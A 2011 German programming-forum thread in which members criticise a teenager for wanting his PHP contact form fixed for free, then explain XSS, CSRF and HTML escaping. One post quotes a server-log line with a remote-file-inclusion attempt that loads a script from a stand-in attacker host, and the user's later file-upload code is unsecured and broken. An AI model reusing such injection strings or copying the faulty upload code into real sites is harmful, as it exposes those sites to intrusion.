Autor Beitrag
BenBE
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 8721
Erhaltene Danke: 191

Win95, Win98SE, Win2K, WinXP
D1S, D3S, D4S, D5E, D6E, D7E, D9PE, D10E, D12P, DXEP, L0.9\FPC2.0
BeitragVerfasst: Do 25.08.11 01:34 
user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
user profile iconBenBE hat folgendes geschrieben Zum zitierten Posting springen:
Stell das in die Job-Börse mit nem vernünftigen Preis und du hast in 0,nix dein funktionierendes Script.

Ich will kein Geld für irrgend ein Programmierer geben,

Ich bin nicht "irrgend ein Programmierer", mal ganz davon abgesehen, dass irgend ein nicht von irre abstammt; sonst müsste ich mich beleidigt fühlen.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
während ich hier in einem Programmier-forum bin wo mir leute für umsonst helfen könnten.

Es gibt einen wichtigen Unterschied zwischen kostenlos und umsonst. Aber gut: Du hast das korrekte von beiden bereits verwendet. GZ!

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich verstehe nicht wo das Problem ist.

HPMoR: Hmmm, Problempersonen scheinen kein Eigenbewusstsein zu besitzen. Und ja, ich weiß, dass das sehr viel Confirmation Bias hat! :mrgreen:

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich will nur das mir jemand sagt ob der genannt code richtig ist

Nein

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
oder was daran flasch ist.

Er hat oben genannte Sicherheitsprobleme.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Aber das ständige mach ein Antrag für die jobbörse oder ver.... mich mit brain.exe.

Sorry, aber für die Lösung via "Selbstständig das Problem eingrenzen" fehlt es Dir eindeutig an Eigeninitiative. Und glaub mir: Der Altruismus vieler Mitglieder hier hat durchaus ein Ende, wie man an gewissen Hühnchen gemerkt hat, die hier letztens gerupft wurden. Es ist einfach eine der Umgangsformen, die erwartet werden, dass man selbstständig arbeitet und selber nach Problemen sucht, um dann gezielt zu fragen, wo es scheitert.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Naja, das ist nicht direkt das was ich mir erwarte.

Was dann?

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Und ob ich jetzt die Grundlagen kann ist doch für euch uninteressant.

Eben nicht. Weil es durchaus einen Unterschied macht, ob ich jemandem vom Fach etwas erkläre, oder einem Einsteiger. Letzterer macht potentiell mehr Arbeit, die ich aber auch gut investiert gewusst haben will.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich möchte doch einfach nur wissen was flasch ist und wie man das richtig macht.

Ich habe 2 Links gepostet, die die in deinem Code vorhandenen Fehler aus sicherheitstechnischer Sicht beschreiben. Das Gelesene dann auf deinen Source anzuwenden, sollte nicht so schwierig sein. Ich hab den Fehler beim Überfliegen in 5 Sekunden gesehen; ihn einfach zu nennen bringt aber vom Lerneffekt für dich gar nix, wenn Du den Hintergrund nicht verstehst/verstehen willst.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Naja. Was will man machen :nixweiss: :( :cry:

Sich hinsetzen die Hinweise sich angucken, überdenken und selbstständig anhand dieser Hinweise versuchen die Lösung zu finden. Wenn Du auf dem Weg zur Lösung irgendwo noch mal hängen bleibst, rupft dich keiner, wenn Du aber am Start stehen bleibst und wartest, dass du im Ziel ankommst, weil dich irgendwelche Programmiersklaven dorthin getragen haben, dann sieht es recht düster aus.

user profile iconDude566 hat folgendes geschrieben Zum zitierten Posting springen:
Den meisten hier geht es aber wohl so, dass sie niemandem alles vorkauen wollen, wenn er selbst kaum bis keine Eigeninitiative zeigt. :roll:

Korrekt erkannt. Ich kann meine Zeit sinnvoller verschwenden.

user profile iconDude566 hat folgendes geschrieben Zum zitierten Posting springen:
Zu den Grundlagen: Wenn du dich damit beschäftigt hättest, was längst hätte passieren können, dann könntest du deinen Code auch selbst auf Fehler checken und bei konkreten Problemen hier fragen. :wink:

Korrekt. Bzw. hättest Du die schon lange gefunden und behoben. Grad PHPEdit hat da sowas Seltsames, nennt sich glaube "Debugger". Das hilft einem, Fehler zu finden. Muss man nur nutzen ;-)

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Hallo,
naja bin erst 13

Hab mit 6 angefangen die ersten Programme zu verändern; richtig programmiert mit 11. Alles autodidaktisch ...

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
und damit recht jung um

Lass mich nicht heulen. Mein Vorrat an Mitleid ist grad aus. :twisted:

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
das ganze gescheit zu verstehen.

Eigene Web-Programmierung mit 9. Nein, ich glaub, ich muss Dir widersprechen.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Aber ich habe mir ja schon Bücher über php geholt

[X] Geholt
[ ] Gelesen
[ ] Verstanden

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
aber den code brauche ich wegen Persönlichen gründen jetzt schon.

Dagegen sagt ja keiner was. Aber wenn Du von uns eine Leistung erwartest ("Hilfe"), dann möchten wir dafür eine Gegenleistung ("Selbstständige Mitarbeit"). Alternativ wäre "Job-Angebot" gegen "Geld" auch eine Alternative. Leider können wir uns auf beides nicht einigen. Glaube nicht unser Problem: Es gibt genug andere, die damit einverstanden sind.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Und so schnell lernt man nicht die Grundlagen.

Halbes Jahr (eigene Erfahrung). IIRC bist Du (unter storestore und 12profi) hier schon länger als 6 Monate dabei. Und um's mal ganz gemein zu machen: Ich hab nem Kumpel mal das Programmieren in 4 Stunden an einem Wochenende beigebracht.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Und dann
(*Schnief*)erwartet man hilfe (*Schnief*) in einem Forum und dann kommt sowas wie brain.exe :( :lol: :cry: :bawling:

In der Hinsicht bin ich sehr direkt; aber wenn man sich deine Threads im Zusammenhang einmal anschaut, dann kann man leicht den Eindruck bekommen, dass Du genau eben das geforderte ("selber mitdenken") nicht tust. Und daher hab ich mich auch bewusst zurückgehalten, weil die Kommentare sonst zu bissig geworden wären.

user profile iconTeekeks hat folgendes geschrieben Zum zitierten Posting springen:
So, nun reichts mir (ich hab mich ja eigentlich deswegen extra immer aus diesen Themen raus gehalten)...

Ui, Einigkeit bei einem Punkt. Oh, welch Wunder! :twisted:

user profile iconTeekeks hat folgendes geschrieben Zum zitierten Posting springen:
Ich übersetze noch einmal, dieses mal aber was DU geschrieben hast:
"Ich habe keine Lust mich damit zu beschäftigen weil hier ja Leute sind die das schnell mal für mich machen könnten. Aber Geld will ich ja nicht ausgeben, weil ja auch anderen umsonst geholfen wird. Aber alle sind ganz gemein zu mir und wollen das nicht machen. Also bettel ich halt noch etwas Rum"

Und sage jetzt bitte nicht das dass nicht genau das ist, was du hier gerade abziehst.

Amtliche Teekeks-Übersetzung unterschreib ich so ;-)

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Dreamweaver und webocton.

Und warum nicht, wie empfohlen PHPEdit mit integriertem PHP-Debugger?

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich hasse das zu sagen aber ihr habt recht. :cry:

Danke.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich muss mir selber helfen.

Nein, du musst eigenständiger werden und Eigeninitiative zeigen. Dann bekommst Du auch von anderen Unterstützung.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Sorry wegen alles.

Die deutsche Rechtschreibung ist Freeware, du darfst sie kostenlos nutzen – Aber sie ist nicht Open Source, d. h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich bin jetzt dabei mich im Internet zu imformieren wie ich eine E-mail mit Anhang versende;)

Hatte dazu ja auch schon was geschrieben. Also wie das geht. Gibt für PHP da auch schon fertige Module, die einen da unterstützen. Ohne das Prinzip verstanden zu haben, bringt dir Copy&Paste aber rein gar nix.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Danke für bringen auf (hoffentlich) den richtigen
Weg;)

Gern geschehen. Hoffen wir, es war nachhaltig.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
XSS: Das einschleusen von gemeinen Java-scripten in die URL

Nicht ganz. Das unterbringen von kontext-fremden Daten, diee fehlinterpretiert werden. Oftmals zum Einschleusen von Scripten missbraucht.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
CSRF: Es wird ein sogennanter Request eingeschoben. Dieser füht eine bestimmte aktion beim aufrufen der Webanwendung aus. Dieser Request gibt dem Bösen buben (Programmierer) daten zurück.

Ja, aber auch noch nicht ganz. Aktionen in einer Web-Anwendung auslösen können, ohne dass ich dafür den vorherigen Status dieser kennen muss. Im Zusammenhang mit deinem Kontakt-Formular könnt ich das zum Bombardieren mit Emails missbrauchen.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Ich habe das nirgends rauskopiert. Sonder ich habe mich INFORMIERT (*stolz sei*) :les:

GZ.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Also alles was der Benutzer eingeben kann kann für mich gefährlich werden.

That's life ;-) Und glaub mir, das ist täglich brot:

Hier mal ein Beispiel für RFI:
Meine Server-Logs:
[23/Aug/2011:18:00:15 +0200] domain.tld:80 127.1.2.3 - - - HTTP/1.0 GET /var/www/virtual/domain.tld/htdocs/news.php 200 200 35595 Req="GET /news.php?id=very.evil.ru/evil.txt?index.php HTTP/1.0" Referer="http://domain.tld/highlighter/news.php?id=http://very.evil.ru/evil.txt?index.php" Agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" SVN="-" SSL="- - -"

Und da hab ich grad nicht lange gesucht ... (Funktioniert übrigens auf meinem Server nicht)

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Na super und ich habe ein Kontaktformular .,.

Jetzt auch klar, warum wir ERST die Security ansprechen und dann die anderen Fehler, die noch so enthalten sind? Gut!

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Hmmm wie kann ich mich dagegen am besten schützen, denn ich kann den Benutzer ja nicht verbieten ins Kontaktformular was reinzuschreiben. Aber wenn ich die ausgaben sprich name usw. in einen array (*Brainstorming*)
Habt ihr noch mehr Tipps
bitte

mfg storestore

In der Regel hilft zur Absicherung das Escaping von Meta-Zeichen. Dafür gibt es in PHP eine ganze Reihe von Funktionen. In deinem Fall musst du die Meta-Zeichen von HTML unwirksam machen. Den Namen der hierfür benötigten Funktion findet man recht leicht in der PHP-Doku.

Gruß,
BenBE.

_________________
Anyone who is capable of being elected president should on no account be allowed to do the job.
Ich code EdgeMonkey - In dubio pro Setting.

Für diesen Beitrag haben gedankt: storestore
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Do 25.08.11 01:48 
Hi, ok danke ähh wegen den HTML codes ich glaube du meinst: htmlentities oder htmlspecialchars ,nee ;)
Hmm bin gerade dabei sicherheit einzubauen. Schwer, schwer.
Darf ich trotz allem wenn ich wieder Probleme habe hier anfragen ?

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"
BenBE
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 8721
Erhaltene Danke: 191

Win95, Win98SE, Win2K, WinXP
D1S, D3S, D4S, D5E, D6E, D7E, D9PE, D10E, D12P, DXEP, L0.9\FPC2.0
BeitragVerfasst: Do 25.08.11 01:55 
user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Hi, ok danke ähh wegen den HTML codes ich glaube du meinst: htmlentities oder htmlspecialchars ,nee ;)

Konkret wäre hier htmlspecialchars die richtige Entscheidung.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Hmm bin gerade dabei sicherheit einzubauen. Schwer, schwer.

Jup. Und das sind so eher die alltäglichen Lücken.

user profile iconstorestore hat folgendes geschrieben Zum zitierten Posting springen:
Darf ich trotz allem wenn ich wieder Probleme habe hier anfragen ?

Ja, gerne. Wichtig ist nur der Punkt Eigeninitiative.

_________________
Anyone who is capable of being elected president should on no account be allowed to do the job.
Ich code EdgeMonkey - In dubio pro Setting.

Für diesen Beitrag haben gedankt: storestore
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Do 25.08.11 11:07 
Hallo,
ich bin noch dabei es zu programmieren, aber was würde sowas in der Jobbörse den Kosten?

mfg storestore

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"
thepaine91
ontopic starontopic starontopic starontopic starontopic starontopic starofftopic starofftopic star
Beiträge: 763
Erhaltene Danke: 27

Win XP, Windows 7, (Linux)
D6, D2010, C#, PHP, Java(Android), HTML/Js
BeitragVerfasst: Do 25.08.11 11:16 
Also bei mir 30€. ^^

Für diesen Beitrag haben gedankt: storestore
Teekeks
ontopic starontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic star
Beiträge: 211
Erhaltene Danke: 23



BeitragVerfasst: Do 25.08.11 11:20 
Das kommt darauf an was du dafür geben möchtest.
Und ob sich dann jemand findet der das dafür macht :)

Für diesen Beitrag haben gedankt: storestore
BenBE
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 8721
Erhaltene Danke: 191

Win95, Win98SE, Win2K, WinXP
D1S, D3S, D4S, D5E, D6E, D7E, D9PE, D10E, D12P, DXEP, L0.9\FPC2.0
BeitragVerfasst: Do 25.08.11 12:28 
Wenn Du dich für Hosting bei mir entscheidest, gäb's das Ganze bei mir für etwa 20 Euro zzgl. Hosting.

_________________
Anyone who is capable of being elected president should on no account be allowed to do the job.
Ich code EdgeMonkey - In dubio pro Setting.

Für diesen Beitrag haben gedankt: storestore
thepaine91
ontopic starontopic starontopic starontopic starontopic starontopic starofftopic starofftopic star
Beiträge: 763
Erhaltene Danke: 27

Win XP, Windows 7, (Linux)
D6, D2010, C#, PHP, Java(Android), HTML/Js
BeitragVerfasst: Do 25.08.11 13:10 
Man man heut zu tage kann man nicht mal zu viel Geld verlangen für einfache Aufträge weil andere das ganze günstiger machen ^^

Für diesen Beitrag haben gedankt: storestore
Horschdware
ontopic starontopic starontopic starontopic starontopic starontopic starofftopic starofftopic star
Beiträge: 744
Erhaltene Danke: 54

Win XP Pro, Win 7 Pro x64
Delphi 7, Delphi XE, C++ Builder 5, SAP R/3
BeitragVerfasst: Do 25.08.11 13:18 
Das nennt sich Lohndumping. Willkommen in der Realität :-D

_________________
Delphi: XE - OS: Windows 7 Professional x64

Für diesen Beitrag haben gedankt: storestore
thepaine91
ontopic starontopic starontopic starontopic starontopic starontopic starofftopic starofftopic star
Beiträge: 763
Erhaltene Danke: 27

Win XP, Windows 7, (Linux)
D6, D2010, C#, PHP, Java(Android), HTML/Js
BeitragVerfasst: Do 25.08.11 13:27 
Und ich hab mich immer gefragt warum ich die Realität zum :puke: finde.

Für diesen Beitrag haben gedankt: storestore
Teekeks
ontopic starontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic star
Beiträge: 211
Erhaltene Danke: 23



BeitragVerfasst: Do 25.08.11 13:38 
user profile iconthepaine91 hat folgendes geschrieben Zum zitierten Posting springen:
Und ich hab mich immer gefragt warum ich die Realität zum :puke: finde.

Wegen dem Brechmittel welches in jeder deiner Mahlzeiten ist natürlich! ;)

Für diesen Beitrag haben gedankt: storestore
elundril
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 3747
Erhaltene Danke: 123

Windows Vista, Ubuntu
Delphi 7 PE "Codename: Aurora", Eclipse Ganymede
BeitragVerfasst: Do 25.08.11 15:44 
user profile iconthepaine91 hat folgendes geschrieben Zum zitierten Posting springen:
Und ich hab mich immer gefragt warum ich die Realität zum :puke: finde.


Das ist der Grund warum ich in meiner eigenen Realität lebe. :mrgreen:

_________________
This Signature-Space is intentionally left blank.
Bei Beschwerden, bitte den Beschwerdebutton (gekennzeichnet mit PN) verwenden.

Für diesen Beitrag haben gedankt: storestore
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Do 25.08.11 17:08 
Ok,danke für die info

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"


Zuletzt bearbeitet von storestore am Fr 26.08.11 17:06, insgesamt 1-mal bearbeitet
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Fr 26.08.11 00:41 
Hi,
ich habe jetzt im internet gesucht und das hier gefunden www.php-einfach.de/codeschnipsel_1114.php
Das interresante für mich aber war das mit dem Datei-upload. Der code ist noch sehr "Gefärhlich" und nicht geschützt, aber das bin ich noch am bearbeiten. Das hauptsächliche Problem ist aber das keine e-mail ankommt. Alles richtig ausgefüllt auch eine "function mail_att" eingefügt, weil er gemekert hat aber jetzt, kommt keine Mail an. Bevor ich die function mail_att eingfügt habe kam auch keine an. Also das liegt nicht daran. Ich habe jetzt schon 1-2 tage gesucht und gesucht und gesucht aber leider finde ich keine hilfe. Könnt ihr mir bitte helfen?

mfg storestore

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"
Dude566
ontopic starontopic starontopic starontopic starhalf ontopic starofftopic starofftopic starofftopic star
Beiträge: 1592
Erhaltene Danke: 79

W8, W7 (Chrome, FF, IE)
Delphi XE2 Pro, Eclipse Juno, VS2012
BeitragVerfasst: Fr 26.08.11 00:50 
Und wir sollen jetzt raten wie dein Code aussieht? :roll:

_________________
Es gibt 10 Gruppen von Menschen: diejenigen, die das Binärsystem verstehen, und die anderen.

Für diesen Beitrag haben gedankt: storestore
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Fr 26.08.11 00:53 
user profile iconDude566 hat folgendes geschrieben Zum zitierten Posting springen:
Und wir sollen jetzt raten wie dein Code aussieht? :roll:

Nein natürlich nicht sorry. Der code ist aber noch ohne sicherheit:

ausblenden Quelltext
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
<form enctype="multipart/form-data" action="t.php" method="POST">

Choose a file to upload: <input name="uploadedfile" type="file" />
<input type="submit" value="Upload File" />
</form>
<?php
function mail_att($to,$subject,$message,$anhang)
   {
     $to= "storestore@web.de";
$anhang = array();
$anhang["name"] = $_FILES['datei_feld']['name'];
$anhang["size"] = $_FILES['datei_feld']['size'];
$anhang["type"] = $_FILES['datei_feld']['type'];
$anhang["data"] = implode("",file($_FILES['datei_feld']['tmp_name']));

mail_att("storestore@web.de","Email mit Anhang","Im Anhang ist eine Datei",$anhang);
}
?>

Ich habe es so gemacht wie beschrieben

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"
Dude566
ontopic starontopic starontopic starontopic starhalf ontopic starofftopic starofftopic starofftopic star
Beiträge: 1592
Erhaltene Danke: 79

W8, W7 (Chrome, FF, IE)
Delphi XE2 Pro, Eclipse Juno, VS2012
BeitragVerfasst: Fr 26.08.11 01:06 
Wenn sich meine müden Augen gerade nicht vergucken, rufst du die Funktion in sich selbst auf, ist das so beabsichtigt?

_________________
Es gibt 10 Gruppen von Menschen: diejenigen, die das Binärsystem verstehen, und die anderen.

Für diesen Beitrag haben gedankt: storestore
storestore
ontopic starontopic starontopic starontopic starofftopic starofftopic starofftopic starofftopic star
Beiträge: 397
Erhaltene Danke: 7

WIN 7
C#
BeitragVerfasst: Fr 26.08.11 01:13 
user profile iconDude566 hat folgendes geschrieben Zum zitierten Posting springen:
Wenn sich meine müden Augen gerade nicht vergucken, rufst du die Funktion in sich selbst auf, ist das so beabsichtigt?

Ohh sorry falscher code :oops:
ausblenden Quelltext
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
Choose a file to upload: <input name="uploadedfile" type="file" />
<input type="submit" value="Upload File" />

<?php
function mail_att($to,$subject,$message,$anhang)
   {
     $to= "storestore@web.de";
$anhang = array();
$anhang["name"] = $_FILES['datei_feld']['name'];
$anhang["size"] = $_FILES['datei_feld']['size'];
$anhang["type"] = $_FILES['datei_feld']['type'];
$anhang["data"] = implode("",file($_FILES['datei_feld']['tmp_name']));

mail_att("storestore@web.de","Email mit Anhang","Im Anhang ist eine Datei",$anhang);
}
?>


Ohh verdamt du hast recht :autsch: :autsch: :autsch:
Sorry für den dobblepost aber sonst wierd es zuviel in einem Beitrag;)

_________________
Der Pc ist nur so schlau, wie derjenige der in steuert!
"Don't Quit. Suffer now, and live the rest of your life as a champion"


Zuletzt bearbeitet von storestore am Fr 26.08.11 08:52, insgesamt 1-mal bearbeitet
Dude566
ontopic starontopic starontopic starontopic starhalf ontopic starofftopic starofftopic starofftopic star
Beiträge: 1592
Erhaltene Danke: 79

W8, W7 (Chrome, FF, IE)
Delphi XE2 Pro, Eclipse Juno, VS2012
BeitragVerfasst: Fr 26.08.11 01:34 
Da ist trotzdem noch der Fehler, hast du denn verstanden was ich gemeint habe?

_________________
Es gibt 10 Gruppen von Menschen: diejenigen, die das Binärsystem verstehen, und die anderen.

Für diesen Beitrag haben gedankt: storestore
Gausi
ontopic starontopic starontopic starontopic starontopic starontopic starofftopic starofftopic star
Beiträge: 8535
Erhaltene Danke: 473

Windows 7, Windows 10
D7 PE, Delphi XE3 Prof, Delphi 10.3 CE
BeitragVerfasst: Fr 26.08.11 08:14 
Hast du denn den von dir verlinkten Beitrag gelesen? Da steht doch die Funktion mail_att, und wie sie auszusehen hat. Warum hast du die denn komplett weggelassen?

_________________
We are, we were and will not be.

Für diesen Beitrag haben gedankt: storestore
Dieses Thema ist gesperrt, Du kannst keine Beiträge editieren oder beantworten.

Das Thema wurde von einem Team-Mitglied geschlossen. Wenn du mit der Schließung des Themas nicht einverstanden bist, kontaktiere bitte das Team.